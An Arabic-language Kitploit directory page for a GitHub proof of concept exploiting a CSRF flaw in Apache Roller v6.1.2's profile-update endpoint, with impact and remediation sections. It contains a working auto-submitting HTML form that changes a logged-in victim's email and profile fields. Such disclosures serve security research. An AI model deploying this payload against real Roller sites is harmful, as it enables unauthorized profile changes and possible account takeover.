Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
roller-csrf — استغلال PoC لثغرة CSRF في نقطة تحديث الملف الشخصي لـ Apache Roller v6.1.2. يتضمن كود استغلال بصيغة HTML لإظهار تغييرات غير مصرح بها في الملف الشخصي. | Kitploit
أدوات/GitHubGitHub/vanlam2001/roller-csrf
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubvanlam2001/roller-csrf

roller-csrf

استغلال PoC لثغرة CSRF في نقطة تحديث الملف الشخصي لـ Apache Roller v6.1.2. يتضمن كود استغلال بصيغة HTML لإظهار تغييرات غير مصرح بها في الملف الشخصي.

عرض المستودع
منذ 9 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

أباتشي رولر v6.1.2 - تزوير الطلب عبر الموقع (CSRF) في تحديث الملف الشخصي

تفاصيل الثغرة

  • الإصدار: v6.1.2
  • التاريخ: 2025-11-09
  • مؤلف الاستغلال: Van Lam Nguyen
  • فيسبوك: https://www.facebook.com/vanlam1412
  • الصفحة الرئيسية للمورد: https://roller.apache.org
  • رابط البرنامج: https://github.com/apache/roller/archive/refs/tags/roller-6.1.2.zip
  • تم الاختبار على: Windows
  • CVE: N/A
  • العرض: https://youtu.be/iPEiVzcpJJU

نظرة عامة

تم اكتشاف أن رولر v6.1.2 والإصدارات الأقدم تحتوي على ثغرة تزوير الطلب عبر الموقع (CSRF) في نقطة النهاية /roller/roller-ui/profile!save.rol.

تسمح هذه الثغرة للمهاجمين بتحديث معلومات الملف الشخصي للمستخدم الضحية (مثل البريد الإلكتروني، الاسم الكامل، اللغة المحلية، المنطقة الزمنية) بشكل تعسفي عبر صفحة HTML مصممة.

إثبات المفهوم

تسمح الثغرة بإرسال طلبات غير مصرح بها إلى /roller/roller-ui/profile!save.rol التي تقوم بتحديث ملف المستخدم الشخصي بدون حماية CSRF.

كود الاستغلال بلغة HTML

root@kitploit:~
<html>
<head>
    <form id="exploitForm" action="http://localhost:8080/roller/roller-ui/profile!save.rol" method="POST">
        <input name="bean.userName" value="vanlam" type="hidden">
        <input name="bean.screenName" value="hacked" type="hidden">
        <input name="bean.fullName" value="hacked" type="hidden">
        <input name="bean.emailAddress" value="[email protected]" type="hidden">
        <input name="bean.passwordText" value="" type="hidden">
        <input name="bean.passwordConfirm" value="" type="hidden">
        <input name="bean.locale" value="vi_VN" type="hidden">
        <input name="bean.timeZone" value="Asia/Bangkok" type="hidden">
    </form>

    <script>
        document.getElementById('exploitForm').submit();
    </script>
</head>
</html>

معلمات النموذج

  • bean.userName: vanlam
  • bean.screenName: hacked
  • bean.fullName: hacked
  • bean.emailAddress: [email protected]
  • bean.passwordText: (فارغ)
  • bean.passwordConfirm: (فارغ)
  • bean.locale: vi_VN
  • bean.timeZone: Asia/Bangkok

التأثير

يمكن للمهاجم إنشاء صفحة HTML ضارة، عند زيارتها من قبل مستخدم رولر موثّق، ستقوم تلقائيًا بإرسال نموذج لتحديث معلومات الملف الشخصي للضحية دون موافقته. يمكن أن يؤدي ذلك إلى:

  • تغييرات غير مصرح بها على بيانات الملف الشخصي للمستخدم
  • احتمالية الاستيلاء على الحساب إذا تم تغيير عنوان البريد الإلكتروني
  • تعطيل تجربة المستخدم من خلال تغيير اللغة المحلية والمنطقة الزمنية

الإصلاح

  • تنفيذ رموز CSRF لجميع الطلبات التي تغير الحالة
  • التحقق من رؤوس Origin وReferer
  • استخدام ملفات تعريف الارتباط من نفس الموقع (same-site cookies)
  • تنفيذ عمليات تحقق من المصادقة والترخيص بشكل صحيح
تنزيل الأداة